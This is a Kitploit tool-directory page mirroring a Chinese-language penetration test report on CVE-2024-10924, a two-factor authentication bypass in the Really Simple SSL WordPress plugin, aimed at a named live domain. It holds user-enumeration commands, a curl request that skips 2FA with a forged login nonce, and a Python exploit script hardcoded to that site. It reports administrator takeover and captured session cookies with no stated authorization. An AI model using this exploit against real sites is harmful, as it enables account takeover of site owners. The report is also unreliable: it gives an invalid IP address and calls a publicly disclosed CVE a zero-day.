Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
wordpress-cve-2024-10924-pentest — # CVE-2024-10924 的渗透测试报告与利用程序——Really Simple SSL 中的 2FA 绕过,包含侦察、利用与修复指南。 | Kitploit
工具/GitHubGitHub/ademto/wordpress-cve-2024-10924-pentest
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试身份验证学习与教育

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
ademto/wordpress-cve-2024-10924-pentest

wordpress-cve-2024-10924-pentest

# CVE-2024-10924 的渗透测试报告与利用程序——Really Simple SSL 中的 2FA 绕过,包含侦察、利用与修复指南。

查看仓库
361年前尚未审核

WordPress CVE-2024-10924 渗透测试报告

Really Simple SSL 插件中的 2FA 绕过漏洞


📋 目录

  • 执行摘要
  • 目标信息
  • 方法论
  • 时间线
  • 侦察阶段
  • 漏洞分析
  • 攻击流程
  • 利用
  • 影响评估
  • 修复建议
  • 所用工具
  • 参考资料
  • 附录

🎯 执行摘要

目标: https://skior.co
漏洞: CVE-2024-10924 - Really Simple SSL 插件中的 2FA 绕过
严重性: 严重(CVSS 评分:9.8)
状态: 已成功利用
发现日期: 2025-06-25
报告版本: 2.1

本次渗透测试发现了一个关键的身份验证绕过漏洞,该漏洞允许未经身份验证的攻击者通过绕过双因素身份验证(2FA)控制来获取 WordPress 网站的管理员访问权限。

主要发现

  • ✅ 安装有 Really Simple SSL 插件的 WordPress 6.8.1
  • ✅ 2FA 绕过漏洞已被成功利用
  • ✅ 获取了用户 "pastor" 的管理员访问权限
  • ✅ 捕获了有效的会话 Cookie
  • ✅ 完全控制 WordPress 管理面板
  • ✅ 零日漏洞(发现时无公开可用的漏洞利用代码)

风险评估矩阵

风险等级可能性影响缓解优先级
严重高系统完全沦陷立即
高中数据泄露高
中低服务中断中

🎯 目标信息

字段值
域名https://skior.co
IP 地址123.456.789.200
服务器nginx/1.26.0 (Ubuntu)
PHP 版本8.2.28
CMSWordPress 6.8.1
易受攻击的插件Really Simple SSL
地理位置美国
托管服务商专业托管(可能是 VPS/专用服务器)

网络信息

  • SSL 证书: 有效(Let's Encrypt)
  • HTTP/2: 支持
  • 安全响应头: 基础实现
  • CDN: 未检测到
  • WAF: 未检测到

🔍 方法论

本次评估遵循了基于行业标准的系统性黑盒渗透测试方法论:

  1. 侦察 - 技术识别与被动枚举
  2. 漏洞发现 - 主动扫描与手动测试
  3. 漏洞利用 - 概念验证的开发与执行
  4. 影响评估 - 评估潜在损害
  5. 文档编制 - 综合报告与修复指南

测试方式

  • 黑盒测试 - 对目标无预先了解
  • 非侵入式 - 对目标系统影响最小
  • 符合道德 - 负责任披露实践
  • 全面覆盖 - 探索多种攻击向量

⏰ 时间线

日期/时间事件详细信息
2025-06-25 14:02初步侦察Wappalyzer 分析完成
2025-06-25 14:05识别技术栈WordPress 6.8.1、nginx、PHP 8.2.28
2025-06-25 14:10用户枚举发现用户 "pastor"(ID:1)
2025-06-25 14:15WPScan 分析未发现已知漏洞
2025-06-25 14:20REST API 枚举发现 Really Simple SSL 端点
2025-06-25 14:25漏洞研究识别出 CVE-2024-10924
2025-06-25 14:30手动测试确认漏洞存在
2025-06-25 14:35漏洞利用开发创建 Python 概念验证
2025-06-25 14:40成功利用获取管理员访问权限
2025-06-25 14:45影响评估记录潜在损害
2025-06-25 15:00报告生成综合文档

🔎 侦察阶段

第 1 步:技术栈识别

A. Wappalyzer 分析

Wappalyzer 结果

已识别的技术:

  • WordPress 6.8.1(最新版本)
  • Elementor 3.29.2(页面构建器)
  • Astra 主题 4.11.3
  • PHP 8.2.28
  • nginx 1.26.0(Ubuntu)
  • jQuery 3.7.1

B. WhatWeb 深度扫描```bash

└─$ whatweb https://skior.co https://skior.co [200 OK] Country[UNITED STATES][US], HTML5,
HTTPServer[Ubuntu Linux][nginx/1.26.0 (Ubuntu)], IP[123.456.789.200],
JQuery[3.7.1],MetaGenerator[Elementor 3.29.2;
features: additional_custom_breakpoints, e_local_google_fonts;
settings: css_print_method-external, google_font-enabled, font_display-swap,
WordPress 6.8.1], PHP[8.2.28], PoweredBy[Skior],
Script[speculationrules,text/javascript], Title[Skior Technologies],
UncommonHeaders[link], WordPress[6.8.1], X-Powered-By[PHP/8.2.28], nginx[1.26.0]

**主要发现:**
- 使用最新版本的现代 WordPress 安装
- 使用 nginx 的专业托管设置
- 自定义品牌("PoweredBy[Skior]")
- 正在使用 Elementor 页面构建器
- 地理位置:美国

### 步骤 2:用户枚举

#### A. WordPress 作者枚举```bash
└─$ curl -I https://skior.co/?author=1
HTTP/1.1 301 Moved Permanently
Server: nginx/1.26.0 (Ubuntu)
Date: Wed, 25 Jun 2025 18:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/8.2.28
X-Redirect-By: WordPress
Location: https://skior.co/author/pastor/

发现的用户: pastor (用户 ID: 1)

B. 其他用户枚举技术```bash

Check for multiple users

for i in {1..10}; do echo "Checking user ID: $i" curl -s -o /dev/null -w "%{http_code}" "https://skior.co/?author=$i" echo " - https://skior.co/?author=$i" done

#### C. 用户名枚举结果

| 用户 ID | 用户名 | 状态 | 重定向 URL |
|---------|----------|--------|--------------|
| 1 | pastor | ✅ 已找到 | `/author/pastor/` |
| 2-10 | N/A | ❌ 未找到 | 404 响应 |

### 步骤 3:漏洞扫描

#### A. WPScan 全面分析```bash
└─$ wpscan --url https://skior.co --api-token my-api-key

扫描结果摘要:

  • ✅ WordPress 6.8.1(最新版本,发布于 2025-04-30)
  • ✅ 主题:Astra 4.11.3(已是最新)
  • ✅ 已识别的插件:
    • Elementor 3.29.2
    • Astra Sites 4.4.26
    • Header Footer Elementor 2.4.2
    • WPForms Lite 1.9.6.1
  • ⚠️ XML-RPC 已启用(潜在攻击向量)
  • ⚠️ 外部 WP-Cron 已启用
  • ❌ 扫描组件中未发现已知漏洞

注意: WPScan 未检测到 Really Simple SSL 插件,表明该插件可能使用了混淆或自定义命名。

B. REST API 枚举```bash

└─$ curl -s https://skior.co/wp-json/ | jq '.routes | keys[]'

**发现的自定义端点:**```
/reallysimplessl/v1/two_fa
/reallysimplessl/v1/two_fa/skip_onboarding
/reallysimplessl/v1/two_fa/do_not_ask_again
/reallysimplessl/v1/two_fa/resend_email_code
/reallysimplessl/v1/two_fa/save_default_method_email
/reallysimplessl/v1/two_fa/save_default_method_email_profile
/reallysimplessl/v1/two_fa/save_default_method_totp
/reallysimplessl/v1/two_fa/validate_email_setup

关键发现: /reallysimplessl/v1/two_fa/skip_onboarding 端点看起来可疑,有必要进一步调查。


🔬 漏洞分析

CVE-2024-10924 研究

在发现自定义 REST API 路由后,外部研究揭示了 CVE-2024-10924,这是一个影响 Really Simple SSL 插件的严重漏洞。

漏洞详情

CVE ID: CVE-2024-10924
CVSS 评分: 9.8(严重)
受影响插件: Really Simple SSL
漏洞类型: 身份验证绕过
攻击向量: REST API
发现日期: 2024 年 11 月 6 日
公开披露: 2024 年 11 月 14 日

技术根本原因

该漏洞源于双因素身份验证 REST API 操作中 check_login_and_get_user 函数对用户验证不当。该函数未能正确验证 login_nonce 参数,从而允许攻击者:

  1. 绕过身份验证: 跳过正常登录流程
  2. 绕过 2FA: 规避双因素身份验证控制
  3. 权限提升: 以任何现有用户(包括管理员)的身份获得访问权限

漏洞代码分析```php

// Simplified vulnerable code structure function check_login_and_get_user($user_id, $login_nonce) { // Missing proper validation of login_nonce $user = get_user_by('ID', $user_id);

// No validation of login_nonce parameter
// This allows any value to be accepted

return $user; // Returns user object without verification

}

#### 受影响的端点

以下 REST API 端点存在漏洞:
- `/reallysimplessl/v1/two_fa/skip_onboarding`
- `/reallysimplessl/v1/two_fa/do_not_ask_again`
- `/reallysimplessl/v1/two_fa/resend_email_code`

#### 漏洞条件

要使此漏洞可利用,需满足以下条件:
- ✅ 必须安装并激活 Really Simple SSL 插件
- ✅ 必须启用双因素认证设置(默认禁用)
- ✅ 系统上必须至少存在一个用户账户
- ✅ REST API 必须可访问(WordPress 默认设置)

---

## 🔄 攻击流程```mermaid
graph TD
    A[Initial Reconnaissance] --> B[Technology Stack Identification]
    B --> C[User Enumeration]
    C --> D[Vulnerability Scanning]
    D --> E[REST API Enumeration]
    E --> F[Discovery of Really Simple SSL Endpoints]
    F --> G[External Research]
    G --> H[Identification of CVE-2024-10924]
    H --> I[Manual Testing]
    I --> J[Exploit Development]
    J --> K[Successful Exploitation]
    K --> L[Admin Access Obtained]
    L --> M[Impact Assessment]
    
    style A fill:#e1f5fe
    style F fill:#fff3e0
    style H fill:#ffebee
    style K fill:#e8f5e8
    style L fill:#f3e5f5

攻击向量摘要

  1. 信息收集 → 识别技术栈
  2. 用户枚举 → 发现管理员用户 "pastor"
  3. API 发现 → 发现易受攻击的 REST 端点
  4. 漏洞研究 → 识别出 CVE-2024-10924
  5. 漏洞利用 → 绕过 2FA 并获得管理员访问权限

⚡ 漏洞利用

概念验证(PoC)开发

A. 手动测试

首先,我们手动测试了该端点以了解其行为:```bash

Test the vulnerable endpoint

curl -X POST "https://skior.co/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
-H "Content-Type: application/json"
-d '{ "user_id": 1, "login_nonce": "invalid_nonce", "redirect_to": "/wp-admin/" }'

#### B. Python 漏洞利用脚本```python
import requests
import urllib.parse
import sys

if len(sys.argv) != 2:
    print("Usage: python exploit.py <user_id>")
    sys.exit(1)

user_id = sys.argv[1]

url = "https://skior.co/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
data = {
    "user_id": int(user_id),  # User ID from the argument
    "login_nonce": "invalid_nonce",  # Arbitrary value
    "redirect_to": "/wp-admin/"  # Target redirection
}

# Sending the POST request
response = requests.post(url, json=data)
下载工具